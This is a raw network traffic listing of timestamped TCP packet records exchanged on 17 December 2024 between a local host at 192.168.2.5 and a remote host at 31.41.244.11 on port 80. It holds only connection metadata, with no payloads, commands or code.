Dec 17, 2024 06:03:11.175029039 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.176045895 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.176103115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.176158905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.176215887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.177246094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.177303076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.177400112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.177455902 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.178442001 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.178497076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.178567886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.178621054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.179620028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.179673910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.179735899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.179795980 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.180815935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.180871964 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.180913925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.180974960 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.182035923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.182097912 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.182169914 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.182226896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.183229923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.183286905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.183358908 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.183410883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.184329033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.184396982 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.314081907 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.314146996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.314196110 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.314248085 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.314654112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.314718962 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.314775944 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.314834118 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.315838099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.315896988 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.315954924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.316015959 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.317040920 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.317100048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.317184925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.317261934 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.318209887 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.318269968 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.318310022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.318373919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.319422007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.319480896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.319564104 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.319632053 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.320630074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.320688963 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.320785999 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.320842981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.321789980 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.321850061 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.321902037 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.321958065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.322982073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.323040962 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.323081017 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.323133945 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.324176073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.324234009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.324274063 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.324326992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.325376034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.325443029 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.325476885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.325532913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.326582909 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.326653004 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.326688051 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.326745987 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.327768087 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.327842951 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.327857971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.327924013 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.328955889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.329021931 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.329080105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.329148054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.330126047 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.330209970 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.330245018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.330313921 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.331368923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.331418037 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.331454992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.331485987 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.332554102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.332614899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.332617998 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.332659960 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.333734989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.333789110 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.333843946 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.333905935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.334914923 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.334973097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.335036993 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.335094929 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.336093903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.336157084 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.336196899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.336252928 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.337285995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.337344885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.337389946 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.337450981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.338574886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.338612080 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.338797092 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.338798046 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.339689970 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.339751005 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.339782953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.339839935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.340929031 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.340986967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.341007948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.341042995 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.342104912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.342170954 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.342180967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.342235088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.343322039 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.343394995 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.343410969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.343465090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.344459057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.344516039 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.344580889 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.344650984 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.345665932 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.345732927 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.345767021 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.345824957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.347284079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.347333908 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.347412109 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.347470999 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.348078012 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.348133087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.348179102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.348233938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.349286079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.349344969 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.349356890 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.349414110 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.350442886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.350498915 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.350545883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.350613117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.351593971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.351716995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.351753950 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.351783037 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.352806091 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.352864981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.352911949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.352972031 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.354011059 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.354069948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.354166985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.354229927 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.355207920 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.355266094 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.355359077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.355418921 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.356434107 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.356497049 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.356571913 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.356630087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.357568026 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.357624054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.357671022 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.357727051 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.358748913 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.358853102 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.358860016 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.358911991 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.359966993 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.360029936 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.360066891 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.360126019 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.361177921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.361243010 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.361282110 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.361340046 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.362329960 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.362401009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.362420082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.362489939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.363538980 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.363605022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.363679886 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.363744974 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.364723921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.364790916 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.364833117 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.364896059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.365959883 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.366017103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.366091967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.366154909 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.367137909 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.367194891 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.367254019 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.367325068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.368319988 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.368376017 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.368468046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.368525028 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.369503975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.369577885 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.369652033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.369713068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.370697021 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.370760918 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.370798111 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.370877981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.371918917 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.371984005 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.372020006 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.372081041 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.373084068 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.373147011 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.373205900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.373253107 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.374304056 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.374368906 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.374373913 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.374433994 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.375478029 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.375543118 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.375580072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.375633001 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.376606941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.378859997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.506345034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.506377935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.506473064 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.506652117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.506932974 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.507009983 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.507081032 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.507143021 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.508141041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.508199930 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.508245945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.508299112 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.509318113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.509375095 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.509411097 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.509476900 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.510515928 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.510576010 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.510617018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.510674953 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.511708975 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.511770010 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.511812925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.511872053 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.512892962 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.512953997 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.512990952 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.513047934 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.514091969 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.514154911 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.514192104 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.514250040 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.515286922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.515347004 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.515383005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.515441895 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.516474009 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.516539097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.516729116 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.516794920 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.517662048 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.517721891 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.517760038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.517818928 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.518857956 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.518917084 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.518961906 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.519022942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.520059109 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.520119905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.520162106 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.520220995 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.521260977 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.521318913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.521358967 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.521406889 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.522454977 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.522512913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.522550106 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.522619009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.523627043 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.523686886 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.523724079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.523777962 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.524816036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.524872065 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.524910927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.524976015 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.526004076 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.526062965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.526129961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.526189089 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.527200937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.527259111 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.527395010 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.527451992 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.528479099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.528533936 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.528538942 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.528582096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.529584885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.529645920 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.529736996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.529807091 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.530776978 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.530834913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.530875921 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.530925035 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.532001972 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.532054901 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.532120943 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.532176971 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.533173084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.533231020 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.533282995 CET	80	49830	31.41.244.11	192.168.2.5
